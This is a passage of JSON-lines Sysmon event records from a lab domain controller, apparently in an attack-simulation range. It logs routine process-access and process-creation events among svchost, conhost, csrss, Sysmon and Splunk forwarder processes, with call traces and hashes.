C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2869,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-0010ABFF0400}\r\nTargetProcessId: 656\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-0010ABFF0400}","TargetProcessId":"656","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2870,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.253\r\nProcessGuid: {A837DB8D-0236-5F25-0000-00106A000500}\r\nProcessId: 4956\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-0236-5F25-0000-0010ABFF0400}\r\nParentProcessId: 656\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.253","ProcessGuid":"{A837DB8D-0236-5F25-0000-00106A000500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-0236-5F25-0000-0010ABFF0400}","ParentProcessId":"656","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2871,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-0236-5F25-0000-0010ABFF0400}\r\nSourceProcessId: 656\r\nSourceThreadId: 748\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00106A000500}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-0236-5F25-0000-0010ABFF0400}","SourceProcessId":"656","SourceThreadId":"748","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00106A000500}","TargetProcessId":"4956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2872,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0236-5F25-0000-00106A000500}\r\nTargetProcessId: 4956\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0236-5F25-0000-00106A000500}","TargetProcessId":"4956","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2873,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2874,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2875,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2876,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:38.244","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:39","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2877,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:38.244\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 